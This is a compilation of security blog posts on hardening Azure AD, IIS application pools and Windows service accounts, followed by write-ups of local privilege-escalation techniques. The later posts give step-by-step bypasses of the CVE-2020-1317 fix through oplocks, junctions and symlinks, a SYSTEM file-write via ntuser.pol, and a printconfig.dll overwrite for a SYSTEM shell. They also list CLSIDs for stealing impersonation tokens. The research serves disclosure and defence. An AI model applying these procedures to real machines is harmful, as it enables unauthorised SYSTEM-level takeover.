Since only another GA can reset a Global Admin’s password, you should have at least two Global Admin users. (Microsoft recommends having no more than 4-5 GAs; do you really need more than that?)

Azure AD roles allow you to grant granular permissions to your admins, providing you a way to implement the principle of least privilege. There are a bunch of predefined roles which you should definitely take into consideration for delegating administrative tasks.

A good starting point to understand Role Based Access control is here.

 
You should not use your everyday account with admin roles to manage administrative tasks; instead, create dedicated accounts for each user with administrative privileges. Those accounts should be cloud-only accounts with no ties to on-premises Active Directory.
 
If your tenant has Azure Active Directory P2 licenses, a good practice is using Privileged Identity Management. It allows you to implement just-in-time privileged access to Azure resources and Azure AD with approval flows.
 
All admin users must obviously use MFA, preferably with the MS Authenticator app rather than SMS or a phone call as the second authentication factor. You should definitely avoid using personal accounts to manage M365 or Azure resources.
 
Last but not least: in order to prevent being accidentally locked out of your Azure Active Directory, have a procedure in place to manage emergency access. Ask yourself what will happen if the service is unavailable because of a network issue, an IdP outage or a natural disaster, or if the other GA users are not available.
Some procedures to manage emergency access can be found here.

Restrict access to Azure Portal

By default, every Azure AD user can access the portal even without specific roles. This means they can access the entire directory and get information about AD settings, including users, groups, and so on. You might argue: ok, a standard Active Directory user can also access all this information on the on-premises side, why should I care? Remember, your Azure AD is normally exposed to the whole internet, so if the user is compromised it would be a juicy option for an attacker, do you agree? We will talk about it later…

Keep in mind that restricting access to the portal does not block access to the various Azure APIs.

Third-party tools such as @_dirkjan’s fantastic “roadrecon”, which interacts with some “undocumented” MS Graph APIs, allow you to dump the whole directory for later investigation and analysis.

Restrict access to MSOnline powershell module

This module provides a lot of PowerShell cmdlets for administering Azure AD. Even if it’s now deprecated, it’s still available, and by default a standard user can access the MSOL service and run a lot of “Get-Msol*” commands.

So the question is: how can we stop this? Well, the answer is very simple: as an admin, launch this command in an MSOL session:
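The command shown in the screenshot is presumably the MSOnline company-settings cmdlet toggling the UsersPermissionToReadOtherUsersEnabled flag discussed below; something like:

```powershell
# Requires the (deprecated) MSOnline module and an admin MSOL session
Connect-MsolService
Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false
```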

This will prevent a standard (non-admin) user from reading other users’ information and in fact inhibits most of the cmdlets:

It also blocks the “roadrecon” tool:

..and AADinternals tools too:

This will also somehow “stop” the dangerous phishing technique via “device code authentication” as described here.

But keep in mind that it will not inhibit other operations, such as sending an email on behalf of the victim once the access token has been obtained. To prevent these types of attacks you should implement dedicated “Conditional Access policies”, available with Premium subscriptions.

Back to us: what could be the side effects of setting this flag? To be honest, it’s not so clear. Googling around, you can find some old posts stating that if “UsersPermissionToReadOtherUsersEnabled is set to false in Azure Active Directory (AAD), users are unable to add external/internal members in Microsoft Teams”.

We were unable to reproduce this misbehavior with Teams and there is no official note from MS about this. It seems that this problem has been resolved.

You can also completely block access to all MSOL cmdlets, including admins, with the AzureADPreview module:

Know what you are doing, because it seems there is no way to add exceptions (for example, for admin users).

Restrict access to AzureAd powershell module

Given that this module is the replacement for the MSOL module, if you have already disabled the permissions via the MSOL cmdlet, the APIs won’t be available in AzureAD either:

You can even restrict access to the Azure AD powershell by assigning roles, as described here

$appId = "1b730954-1685-4b74-9bfd-dac224a7b894" #azuread

$sp = Get-AzureADServicePrincipal -Filter "appId eq '$appId'"

if (-not $sp) { $sp = New-AzureADServicePrincipal -AppId $appId}

$user = Get-AzureADUser -objectId <upn> #permit only to this user(s) to access Azure Ad PS

New-AzureADServiceAppRoleAssignment -ObjectId $sp.ObjectId -ResourceId $sp.ObjectId -Id ([Guid]::Empty.ToString()) -PrincipalId $user.ObjectId

If a user is not explicitly permitted, he cannot access it:

Following the same procedure, you can also restrict access to MS Graph module (appid: 14d82eec-204b-4c2f-b7e8-296a70dab67e)

Disable Legacy Authentication

Disabling Legacy Authentication is a must-do if you are thinking about how to reduce your attack surface.

Legacy Authentication refers to all protocols that use the insecure Basic Authentication mechanism; if you don’t block legacy authentication, your MFA strategy won’t be as effective as expected.

Among legacy authentication protocols are:

  • Exchange ActiveSync (EAS)
  • Exchange Web Services (EWS)
  • IMAP4
  • MAPI over HTTP (MAPI/HTTP)
  • RPC over HTTP
  • POP3
  • Authenticated SMTP
  • ….

Modern authentication is based on the Active Directory Authentication Library (ADAL) and OAuth 2.0 which support multi-factor authentication and interactive sign-in.

But blocking legacy authentication in your directory is easier said than done… you need to evaluate and understand the potential impacts first!

Analyzing the Azure AD sign-in logs is a good starting point.

  • Navigate to the Azure portal > Azure Active Directory > Sign-ins.
  • Add the Client App column if it is not shown by clicking on Columns > Client App.
  • Add filters > Client App > select all of the legacy authentication protocols. Select outside the filtering dialog box to apply your selections and close the dialog box

Unfortunately there is no magic “recipe”: you should avoid using applications which don’t support modern authentication 😦

For example, if you are still using the unsupported Outlook/Office 2010, it’s really time to upgrade to a newer version.

Blocking legacy authentication using Azure AD Conditional Access

The best way to block legacy authentication to Azure AD is through Conditional Access. Keep in mind it requires at least Azure Active Directory P1 licenses.

You can directly and indirectly block legacy authentication with CA policies and include/exclude specific users and groups as shown here

Consider enabling your blocking policy in Report-only mode to monitor the impact before changing the state of the policy from “Report-Only” to “On”.

Blocking legacy authentication service-side

If you don’t have Azure AD P1 or P2 licenses, the good news is that nothing is lost! Legacy authentication can be blocked service-side or resource-side.

Exchange Online

The easiest way is just to disable the protocols which by default use legacy authentication, like POP3, IMAP, …

This can be done via the Exchange management PowerShell:

Get-CASMailbox -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | Set-CASMailbox -ImapEnabled $false -PopEnabled $false

With these commands you will disable IMAP and POP3 for all mailbox users. Once done, you can re-enable them only for the specific subset of users who really need these protocols.
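Re-enabling the protocols for the few users who really need them can then be done per mailbox; a sketch with a hypothetical identity:

```powershell
# Hypothetical mailbox; re-enable IMAP only for this user
Set-CASMailbox -Identity "[email protected]" -ImapEnabled $true
```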

You can also set a global policy which will disable these protocols for all new mailboxes:

Get-CASMailboxPlan -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | set-CASMailboxPlan -ImapEnabled $false -PopEnabled $false

The problem with this setting arises if you don’t want to block protocols that can do both legacy and modern authentication. Exchange Online has a feature named authentication policies that you can use to block legacy authentication per protocol.

To manage authentication policy in Microsoft 365 Admin Center:

  • Navigate to the Microsoft 365 admin center
  • Settings > Org Settings
  • Navigate to Modern Authentication

You can fine-tune these settings even further by allowing/disallowing basic authentication protocols for specific users using the authentication policy cmdlets:

New-AuthenticationPolicy -Name "Allow Basic Authentication for POP3"
Set-AuthenticationPolicy -Identity "Allow Basic Authentication for POP3" -AllowBasicAuthPop
Set-User -Identity [email protected] -AuthenticationPolicy "Allow Basic Authentication for POP3"

Sharepoint Online

In order to disable legacy authentication on your SharePoint Online tenant you can use the following cmdlets:

Connect-SPOService -Url https://<tenant>-admin.sharepoint.com
Get-SPOTenant
Set-SPOTenant –LegacyAuthProtocolsEnabled $false

Applications, Consent and Permissions.. oh my..

The variegated world of the so-called “Applications” essentially has to interact with the ecosystem of O365 services exposed through public APIs, and it’s up to you to manage and grant the appropriate permissions requested by the apps. It’s a complex topic, and in this chapter we will give you some simple advice. If security is your concern (I bet it is), the first thing to do is to prohibit user consent for “unknown” apps, given that it’s allowed by default (??).

Why should you do it? Because a more restrictive consent setting (as highlighted in the screenshot) will prevent most of the well-known phishing techniques that abuse “malicious apps” and OAuth2. You can find an excellent example by @merlos here.

If the user clicks on the malicious link in the phishing email, he will no longer be able to accept the requested permissions:

Instead, he will be presented with this screen, where the organization admin’s approval is required:

You should also disable the “Users can register applications” feature.

Only users with administrative roles, or a limited subset of users with the “Application developer” role, should be allowed to register custom-developed applications, after these have been reviewed and evaluated from a security perspective as well.

Conclusion

In this short post we hope to have given you some useful tips on how to secure your tenants. The topic is clearly much more complex and requires dedicated skills, but as usual you have to start from the basics 😉

In the next post we will (hopefully) write about logging, auditing and detection… stay tuned!

.. and adopt Two Factor Authentication (2FA) for all your users!!

Hands off my IIS accounts!

By: Decoder
14 December 2020 at 16:03

As promised in my previous post, I will (hopefully) give you some advice on how to harden the IIS “Application Pool” accounts, aka “identities”.

First of all, we need to understand how the IIS architecture works and how identities are managed. Therefore I suggest reading some specific posts about this topic, for example this one and this one. More about identities can be found here.

Ok! Now that you have all the details, let’s start from the IIS worker process “w3wp”. This is the process which effectively accesses the HTTP resources we ask for and serves them. By default this process runs under the “ApplicationPoolIdentity” identity. This is nothing more than a “Virtual Account” (in this case the default one), named after the application pool, which IIS creates for us. Virtual accounts are managed directly by the OS, so you don’t need to set passwords.

We can create dedicated application pools and assign them to web sites. Given that every application pool then has its own Virtual Account, we can secure access to resources based on the single application pool identity.

This is really cool, so we are able to set our security boundaries.

Let’s take a closer look at the process:

We can observe that the AppPool identity is a member of the built-in “IIS_IUSRS” group and also of the “SERVICE” group. Unfortunately, it also has two dangerous privileges: SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, probably the most abused privileges for escalation when you are able to get code execution on a buggy web application (in the following screenshot we uploaded a webshell). Do you agree?

I think that everyone who is responsible for securing IIS web applications would like to limit these privileges, especially if they aren’t needed. In fact, the impersonation privileges are only useful if IIS needs to impersonate the Windows user who accessed the web app (<identity impersonate="true" />), otherwise who cares?

So the first question is: is it safe to remove the privileges in this context?

There is no official documentation from MS about this, but there is no reason why it should lead to problems as long as you don’t need to impersonate.

Now let’s see how privileges are configured.

We need to launch the Policy editor “gpedit.msc” and go to:

Computer Configuration->Windows Settings->Security Settings->Local Policies->User Right Assignment

This is the configuration for the “Impersonate a client after Authentication” (SeImpersonatePrivilege):

Bad news: the IIS_IUSRS and SERVICE groups have this privilege by default, and the application pool identities belong to these groups.

For “Replace a process level token” (SeAssignPrimaryTokenPrivilege) we have:

Again, our application pool identities and the SERVICE group have this privilege.

We could indeed inhibit the automatic membership in the “IIS_IUSRS” group by modifying the appropriate XML file following the official MS documentation (side note: I was not able to perform this action; I always got an HTTP 503 error when it was set to “true”):
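For reference, the setting in question should be the manualGroupMembership attribute of the application pool’s processModel element in applicationHost.config (pool name hypothetical):

```xml
<!-- %windir%\System32\inetsrv\config\applicationHost.config, sketch only -->
<add name="MyAppPool">
  <processModel identityType="ApplicationPoolIdentity" manualGroupMembership="true" />
</add>
```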

But this would not solve our problem, given that the application pool identities belong to the SERVICE group by default, and we cannot remove this group from the application pool. Moreover, we cannot remove the impersonation privileges from the SERVICE group.

So what can we do?

First of all, we have to forget 😦 the Virtual Accounts and assign a “real” Windows account to our application pool (just a standard user with a very strong password, set to “never expires”).
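The same assignment can be scripted with appcmd.exe; a sketch where the pool name, user and password are placeholders:

```powershell
& "$env:windir\System32\inetsrv\appcmd.exe" set apppool "MyAppPool" `
    /processModel.identityType:SpecificUser `
    /processModel.userName:"web" `
    /processModel.password:"<very strong password>"
```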

Let’s see the result:

The user (web) is no longer a member of the SERVICE group; this is a good starting point.

He is still a member of IIS_IUSRS and IIS APPPOOL\MyAppPool, so in order to remove our unwanted privileges, in the Group Policy Editor we have to:

  • Remove IIS_IUSRS from “Impersonate a Client after Authentication”
  • Remove IIS APPPOOL\MyAppPool from “Replace a process level token”
  • Restart the IIS services and observe the result…

Yes! The privileges are no longer present, as confirmed by listing the w3wp process token:

Now we can feel more comfortable, given that we have secured these accounts, right? Well… not exactly… there are still a lot of nasty things you can do in session 0… more about this maybe in a future post 😉

Hands off my service account!

By: Decoder
5 November 2020 at 20:45

Windows service accounts are one of the preferred attack surfaces for privilege escalation. If you are able to compromise such an account, it is quite easy to get the highest privileges, mainly due to the powerful impersonation privileges that are granted by default to services by the operating system.

Even if Microsoft introduced WSH (Windows Service Hardening), there isn’t much you can do to “lower” the power of standard Windows services, but if you need to build or deploy a third-party service you can definitely strengthen it by using WSH.

In this post I will show you some useful tips.

Make use of Virtual accounts

Obviously a service must be run with a specific account. There are some built-in Windows accounts like SYSTEM (oh no!!), Local Service and Network Service. But there is also the ability to use Virtual Accounts (I won’t write about “Group Managed Service Accounts” in this post), which are self-managed (no need to deal with passwords) and to which you can grant specific permissions by setting the correct ACLs on the resources. This allows you to isolate the service: in case of compromise, it can only access the resources you have allowed. Virtual accounts can also access network resources, but in this case they will impersonate the computer account (COMPUTERNAME$).

Configuring Services with Virtual Accounts

First of all, you don’t need to create VSAs: when the service is installed, a matching account is automatically created for you in the form:

NT SERVICE\<service name>

All you need to do is assign the account to your service:

Don’t forget to leave the password field blank!
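For reference, the same assignment can be sketched with sc.exe (service name hypothetical; note that sc.exe requires a space after obj=):

```powershell
# Assign the matching virtual account to the service; no password is needed
sc.exe config MyService obj= "NT SERVICE\MyService"
```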

Restricting access to Virtual Accounts

Now that your service runs under a specific account, and not a generic one like Local Service or Network Service, you can implement fine-grained access control on resources like files and directories:
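For example, with icacls you can grant the virtual account modify rights on just the data folder it needs (path hypothetical):

```powershell
# M = Modify; (OI)(CI) propagate the grant to files and subfolders
icacls "C:\MyServiceData" /grant "NT SERVICE\MyService:(OI)(CI)M"
```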

Removing unnecessary privileges

Impersonation privileges are a nightmare, so if your service doesn’t need to impersonate, why should we grant them to this service user?

Is it possible to remove this default privilege? There is good news: yes! We can configure the privileges directly in the registry or by using the “sc.exe” command:
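With sc.exe privs you pass the complete, slash-separated list of privileges the service is allowed to keep; everything not listed (including the impersonation privileges) is stripped. A sketch for a hypothetical service:

```powershell
# Keep only these two privileges; SeImpersonatePrivilege is not among them
sc.exe privs MyService SeChangeNotifyPrivilege/SeCreateGlobalPrivilege
```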

And these values will be written into registry:

Let’s see if the privilege is removed:

Oh yes! The dangerous privilege has been removed and it’s no longer possible to get it back, for example using @itm4n’s trick described in this great post.

Write Restricted Token

If you add this extra group to your service tokens, you can further limit the permissions of your service account.

This means that by default you can only read or execute resources unless you explicitly grant write access:
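If I’m not mistaken, the write-restricted token is enabled through the service SID type, and write access then has to be granted explicitly to the service SID; a sketch (names and paths hypothetical):

```powershell
# Mark the service SID as write-restricted
sc.exe sidtype MyService restricted
# Explicitly grant write access where the service must write
icacls "C:\MyServiceData\Logs" /grant "NT SERVICE\MyService:(OI)(CI)W"
```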

Great research on write-restricted tokens can be found in Forshaw’s post.

Conclusions

I hope that this very short post can be useful for those of us who must secure our Windows systems (offensive sec is just a joke for me 🙂).

In the next post I will show you how to remove impersonation privileges in other critical services… stay tuned

UPDATE

Following Forshaw’s recent blog post and hint, and his post on “Sharing a Logon Session a Little Too Much“, I can confirm that you can gain back your privileges with the “loopback pipe trick”. This is possible because you will get the original token stored in LSASS, without the privileges stripped by the Service Control Manager. So is the only solution to prevent this to associate a write-restricted token with your service?

Well not exactly … -> https://bugs.chromium.org/p/project-zero/issues/detail?id=2194

The use of WRITE RESTRICTED is considered by Microsoft to be of primary use for mitigating ambient privilege attacks 😦

That’s all 😉

When a stupid oplock leads you to SYSTEM

By: Decoder
27 October 2020 at 17:26

As promised in my previous post, I’m going to show you the second method I found in order to circumvent CVE-2020-1317.

Prerequisites

  1. A domain user has access to a domain-joined Windows machine
  2. The domain user must be able to create a subdirectory under “Datastore\0”, which is theoretically no longer possible. But as we will see, there are at least two methods to bypass the limitation.

First Method: “Domain Group Policy” abuse

We will implement a Domain User Group Policy which produces “files”, typically script files such as logon/logoff scripts or configuration preference XML files. This is a very common scenario in enterprise AD domains.

Steps to reproduce

  • In this case we are going to configure user preferences under “User Configuration\Preferences\Windows Setting” in Group Policy Management. But it’s just an example, logon/logoff scripts will work too.
  • On the Domain Controller create a Domain preferences policy (for example “Ini Files”)

  • Login with domain user credentials on a domain joined computer
  • Check if the “Group Policy Cache” has been saved under the directory:
    • C:\ProgramData\Microsoft\GroupPolicy\Users\<SID>\Datastore (the entire directory, subdirectories and files are read-only for users after CVE-2020-1317)
    • If not, perform a “gpupdate /force” via command prompt
  • We can observe that the preference “inifiles.xml” has been created  
  • Now we will place an exclusive “oplock” [1] on this file:

  • In a new command prompt, we will force a new “gpupdate /force”. The oplock will be triggered and policy processing hangs:
  • Here comes the fun part(!), when Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access. This is the first run and we should have full control over the “Datastore” folders. In a new command prompt, we will try to create a directory under “Datastore\0” folder:
  • Once created, we disable inheritance and remove the permissions for SYSTEM and the Administrators group. Why? Because when we release the “oplock”, the “second run” will occur, during which the domain user will be granted read-only access. Given that the process is running as SYSTEM, this operation will be denied. This can be observed in the following procmon screenshot:
  • Now we have a directory with full control where we can place a symlink via \RPC Control to a SYSTEM protected file… and, just as an example, alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in previous blog posts [3]

Second Method: redirect Windows Error Processing “ReportQueue” directory

In this case we are going to redirect the “C:\ProgramData\Microsoft\Windows\WER\ReportQueue” folder to the “Datastore\0” directory. This folder is normally empty if no error reporting process is running.

Steps to reproduce

  • Create the junction. In this case we are using CreateMountPoint.exe[3]; we could also use the built-in “mklink /j” command, but we would need to remove the existing directory first

  • Ensure that optional diagnostic data etc. has been turned on in Settings->Privacy->Diagnostics & feedback
  • Launch “Feedback Hub” and report a problem. Remember to check “Save a local copy…”
  • You will observe that the redirected “ReportQueue” directory gets populated. As soon as this happens, perform a “gpupdate /force”
  • Once the update has finished, you will be able to create a directory under the “Datastore\0” folder. At this point, you can proceed with the same technique explained before
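For illustration only, the redirect step can be sketched cross-platform with a directory symlink (the post uses an NTFS mount point created with CreateMountPoint.exe or “mklink /j”; all paths below are made-up stand-ins):

```python
import os
import tempfile

base = tempfile.mkdtemp()

# Stand-in for ...\GroupPolicy\users\<SID>\Datastore\0 (the folder we want populated)
target = os.path.join(base, "Datastore", "0")
os.makedirs(target)

# Stand-in for C:\ProgramData\Microsoft\Windows\WER\ReportQueue
link = os.path.join(base, "ReportQueue")
os.symlink(target, link, target_is_directory=True)  # junction-style redirect

# Anything the error-reporting flow drops into "ReportQueue" lands in Datastore\0
open(os.path.join(link, "Report.wer"), "w").close()
print(os.listdir(target))
```

On Windows a mount point is preferable to a symlink here, because creating it does not require SeCreateSymbolicLinkPrivilege.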

Conclusions:

I think I have successfully demonstrated that, even after the CVE-2020-1317 fix, there were still several possibilities to abuse junctions and SetSecurity calls in the Group Policy client in order to perform an elevation of privilege starting from a low-privileged domain user.

That’s all 😉

When ntuser.pol leads you to SYSTEM

By: Decoder
24 October 2020 at 16:32

This is a super short writeup following my previous post. My last sentence was a kind of provocation, because I already knew that there were at least 2 “bypasses” for CVE-2020-1317.

I did not submit them because I totally disagree with recent MSRC changes in their policies, so when I discovered that they were fixed with the latest security updates I decided to share my findings.

So here we are, this is the first one (the next hopefully coming soon). I won’t dig too much into the details. Let’s start from Group Policy caching again. This “feature” is enabled by default but can be turned off, and on Windows Server it’s disabled by default.

When GP caching is disabled, a new privilege escalation is possible (more on this later). If certain policies are configured, the file “ntuser.pol” is written in c:\programdata\microsoft\grouppolicy\users\<sid>.

The domain user has Full Control (!) over this directory and over ntuser.pol too. The file has the hidden and system attributes set, but we can of course remove them.

Let’s see what happens with procmon..

This is interesting!

The file ntuser.pol is renamed to tempntuser.pol by the Group Policy service running as SYSTEM. Got it? At the end, “tempntuser.pol” is deleted:

So we can obviously perform an “arbitrary delete” by abusing our beloved symlinks via “\RPC Control”, but the rename operation can also let us write a file (with filename and contents under our control) with SYSTEM privileges, and that’s a real EoP! We also need to inhibit the file deletion, otherwise our file won’t exist anymore at the end of the process.

The procedure is rather simple; I think this simple batch file is more than sufficient 🙂

“test.dll” is our “source” file, which we place in a directory where we have full control, because during move operations the file keeps its source ACL.

The “poc.exe” tool simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
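The waiting part of that helper can be sketched portably; the function name and timings are mine, and the oplock itself (placed once the file shows up) is Windows-specific and not modeled here:

```python
import os
import time

def wait_for_file(path, timeout=30.0, poll=0.05):
    """Poll until `path` exists, or give up after `timeout` seconds."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if os.path.exists(path):
            return True  # the real tool would now place the oplock on it
        time.sleep(poll)
    return False
```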

And at the very end, we have our file written in System32, with full control over it!

But why do we have full control under the <SID> directory? Well, what I observed is that when Group Policy caching is enabled, a “Datastore” sub-directory is created and the correct permissions are then set… (see also my previous post)

That’s all 😉

Abusing Group Policy Caching

By: Decoder
23 September 2020 at 20:20

In this post I will show you how I discovered a severe vulnerability in the so-called “Group Policy Caching” which was fixed (among other GP vulnerabilities) in CVE-2020-1317

A standard domain user can perform, via the “gpsvc” service, an arbitrary file overwrite with SYSTEM privileges by altering the behavior of “Group Policy Caching”.

Cool, isn’t it?

The “Group Policy Caching” feature has been configurable since Windows 8 / Server 2012; here you can learn more about it: https://specopssoft.com/blog/things-work-group-policy-caching/

For our goal, all you need is just a domain user and at least the “Default Domain” policy applied; no special configuration and no special settings in “Group Policy Caching” are needed. Only default configurations 😉

The “Group Policy caching files” are stored under subfolders:

  • C:\users\<domain_user>\AppData\Local\GroupPolicy\datastore\0

Each time a standard domain user performs a “gpupdate /force”, the directory is created (if it doesn’t exist) and then populated depending on the group policies which are applied.

The domain user has full control over the “Datastore” directory but only read access under the “0” subfolder.

This can be easily overridden: we just rename the “Datastore” folder and create a new “Datastore” folder with a “0” subfolder.
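The rename trick itself is just two filesystem operations; here is a minimal sketch with throwaway paths (the ACL side of it is Windows-only and not modeled):

```python
import os
import tempfile

gp = tempfile.mkdtemp()                    # stands in for ...\GroupPolicy
datastore = os.path.join(gp, "Datastore")
os.makedirs(os.path.join(datastore, "0"))  # the cache as gpsvc created it

# Rename the old cache away and recreate Datastore\0 ourselves, so the
# new tree is owned by us with permissions we control.
os.rename(datastore, datastore + ".old")
os.makedirs(os.path.join(datastore, "0"))

# Now we can drop a test file into the "0" folder before the next gpupdate.
open(os.path.join(datastore, "0", "test.txt"), "w").close()
```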

Now let’s create a file in the “0” folder:

and then run a “gpupdate /force” watching what happens in procmon:

As we can see, the file is opened without impersonation (SYSTEM) and 2 SetSecurity calls are made. The resulting permissions on the test file are:

Very strange, we lost full control over the file, probably because of the second SetSecurity call. But what about the first one?

Let’s move a step forward, now we create a junction under the “0” folder pointing to a protected directory, for example: “c:\users\administrator\documents”

Note: we obviously need to rename the actual “Datastore” folder and create a new one with the “0” subfolder, given that we now have only read access again

Again, in procmon let’s see what happens with a new “gpupdate /force”

A first SetSecurity call is made on “desktop.ini”, and then the processing stops due to an access denied error on “MyMusic”.

What will the resulting permissions of “desktop.ini” be? Guess what: full control for our user!

Now we have a clear vision of the whole picture:

When Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access.

Being able to obtain full control over a SYSTEM-protected file (during the first SetSecurity call), EoP should be super easy, don’t you agree?

For example, we can alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in my post: https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/

To achieve my goal, I created a very simple POC; here are the relevant parts:

When the target file is accessed, an “opportunistic lock” is set, and afterwards the junction is switched to point to “\RPC Control”, which will in fact stop the processing and the second SetSecurity call.

Our domain user now has full control over the file!

Microsoft fixed this security “bug” by simply moving the “Group Policy” folders under c:\programdata\microsoft\grouppolicy\users\<sid>, which is read-only for standard users…

That’s all 🙂


The impersonation game

By: Decoder
30 May 2020 at 15:23

I have to admit, I really love Windows impersonation tokens! So when it comes to the possibility of “stealing” and/or impersonating a token, I never give up!

This is also another chapter of the never-ending story of my beloved “JuicyPotato”.

So, here we are (refer to my previous posts in order to understand how we arrived at this point):

  • You cannot specify a custom port for the OXID resolver address in the latest Windows versions
  • If you redirect the OXID resolution requests to a remote server on port 135 under your control and then forward the request to your local fake RPC server, you will obtain only an ANONYMOUS LOGON.
  • If you resolve the OXID resolution request to a fake “RPC server”, you will obtain an identification token during the IRemUnknown2 interface query.

The following image should hopefully describe the “big picture”

 

But why this identification token and not an impersonation one? And are we sure that we will always get only an identification token? We need at least an impersonation token in order to elevate our privileges!

But first of all we need to understand who/what is generating this behavior. A network capture of the NTLM authentication could help:  

The verdict is clear: in the first NTLM message, the client sets the “Identify” flag, which means that the server should not impersonate the client.

Side note: don’t even try to change this flag (remember, we are doing a kind of MITM attack on local NTLM authentication, so we could alter the value); the client would not answer our NTLM type 2 message!

But why does the client activate this flag? Well, probably it’s all in this RPC API client call setup:

RPC_STATUS RpcBindingSetAuthInfoExA( 
RPC_BINDING_HANDLE Binding, 
RPC_CSTR ServerPrincName, 
unsigned long AuthnLevel, 
unsigned long AuthnSvc, 
RPC_AUTH_IDENTITY_HANDLE AuthIdentity, 
unsigned long AuthzSvc, 
RPC_SECURITY_QOS *SecurityQos 
);

More precisely in this structure:

typedef struct _RPC_SECURITY_QOS {
unsigned long Version; 
unsigned long Capabilities; 
unsigned long IdentityTracking; 
unsigned long ImpersonationType; 
} RPC_SECURITY_QOS, *PRPC_SECURITY_QOS;

The client can define the desired impersonation level before connecting to the server. At this point we can assume that this is the default:

ImpersonationType = RPC_C_IMP_LEVEL_IDENTIFY

for the COM security settings when svchost starts the service DLL inside svchost.exe.

This is also controlled via a registry key (thanks to @tiraniddo for reminding me of this) located in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, where the impersonation level can be defined, overriding the default value.

In the following screenshot we can observe that all services belonging to the “print” group will call the CoInitializeSecurity function with impersonation level = 3 (Impersonate)
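For reference, these are the RPC/COM impersonation level constants that registry value maps to (values taken from the Windows SDK headers):

```python
# RPC_C_IMP_LEVEL_* constants from the Windows SDK (rpcdce.h)
RPC_C_IMP_LEVEL = {
    0: "DEFAULT",
    1: "ANONYMOUS",    # server sees an anonymous client
    2: "IDENTIFY",     # server may check the identity, but not act as the client
    3: "IMPERSONATE",  # server may act as the client on the local system
    4: "DELEGATE",     # server may act as the client on remote systems too
}
print(RPC_C_IMP_LEVEL[3])  # the level configured for the "print" svchost group
```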

And which service belongs to this group?

It’s the “PrintNotify” service, which can be instantiated and accessed by the following DCOM server:

Ok, let’s see what happens on a fully patched Win10 1909 if we try to initialize this object via the IStorageTrigger, redirect to our fake OXID resolver and then intercept the authentication callbacks.

The first request with ANONYMOUS LOGON is relative to the redirected OXID resolution request. The two subsequent ones are generated by the IRemUnknown2 queries, and this time we have impersonation tokens from SYSTEM!

And according to the registry configuration, we can see that the Impersonation parameter is read from the registry:

But wait, there is still another problem:

The SERVICE accounts (which are typically the users we will “target” because they have impersonation privileges) cannot start/launch the service/DLL and do not belong to the INTERACTIVE group.

Again, no way? Well not exactly.

With my modified JuicyPotato, “juicy_2” (see previous screenshot), running as “NT AUTHORITY\Local Service”, I tested all CLSIDs (7268 on my Windows 10 1909) in order to find something else, and this is the result:

There were 2 other CLSIDs which impersonate LOCAL SYSTEM:

  1. {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} which is hosted by the obsolete ActiveX Installer service:


This service belongs to the “AxInstSVGroup” group, but surprisingly this group is not listed in the registry, so I would expect an identification token! This means that the previous assumption is not always true; the impersonation level is not exclusively controlled via the registry configuration…

2. {C41B1461-3F8C-4666-B512-6DF24DE566D1} This one does not belong to a specific service but is related to an Intel Graphics Driver, “IntelCpHeciSvc.exe”, which hosts a DCOM server.




Clearly, the presence of this driver depends on the HW configuration of your machine.

The other CLSIDs impersonate the interactive user connected to the first session:

{354ff91b-5e49-4bdc-a8e6-1cb6c6877182} – SpatialAudioLicenseServerInteractiveUser

{38e441fb-3d16-422f-8750-b2dacec5cefc} – ComponentPackageSupportServer

{f8842f8e-dafe-4b37-9d38-4e0714a61149} – CastServerInteractiveUser

So if you have impersonation privileges and an admin is connected interactively, you could obtain his token and impersonate him.

I did the same test on the CLSIDs of a Windows Server 2019 machine, but this time I was not able to get a SYSTEM impersonation token. The ActiveX Installer service is disabled by default on this OS. The only valid CLSIDs were the 3 relative to the interactive user.

Well that’s all for now, the Impersonation game never ends 😉

.. and thanks to @splinter_code

Source code can be found here


No more JuicyPotato? Old story, welcome RoguePotato!

By: Decoder
11 May 2020 at 14:55

 

After the hype we (@splinter_code and me) created with our recent tweet, it’s time to reveal what exactly we did in order to get our beloved JuicyPotato kicking again… (don’t expect something disruptive 😉 )

We won’t explain how the *potato exploits work, how they were fixed, etc.; there is so much literature about this, and Google is always your best friend!

Our starting point will be the “RogueWinRM” exploit.

In fact, we were trying to bypass the OXID resolver restrictions when we came across this strange behavior of BITS. But what was our original idea?

“(…) we found a solution by doing some redirection and implementing our own “Oxid Resolver” . The good news is that yes, we got a SYSTEM token! The bad one: it was only an identification token, really useless

Short recap

  • You try to initialize a DCOM object identified by a particular CLSID from an “IStorage object” via standard marshalling (OBJREF_STANDARD)
  • The “IStorage” object contains, among other things, the OXID, OID and IPID parameters needed for the OXID resolution in order to get the bindings required to connect to our DCOM object interfaces. Think of it as a sort of DNS query
  • From “Inside COM+: Base Services”: The OXID Resolver is a service that runs on every machine that supports COM+. It performs two important duties:
    • It stores the RPC string bindings that are necessary to connect with remote objects and provides them to local clients.
    • It sends ping messages to remote objects for which the local machine has clients and receives ping messages for objects running on the local machine. This aspect of the OXID Resolver supports the COM+ garbage collection mechanism.
  • The OXID resolver is part of the “rpcss” service and runs on port 135. Starting from Windows 10 1809 & Windows Server 2019, it’s no longer possible to query the OXID resolver on a port different from 135
  • OXID resolutions are normally authenticated. We are only interested in the authentication part, which occurs via NTLM, in order to steal the token, so in our case we can specify just 32 random bytes for the OXID, OID and IPID.
  • If you specify a remote OXID resolver, the request will be processed with an “ANONYMOUS LOGON“.

So what was our idea in our previous experiments?

  • Instruct the DCOM server to perform a remote OXID query by specifying a remote IP in the binding strings instead of “127.0.0.1”. This is done in the “stringbinding” structure
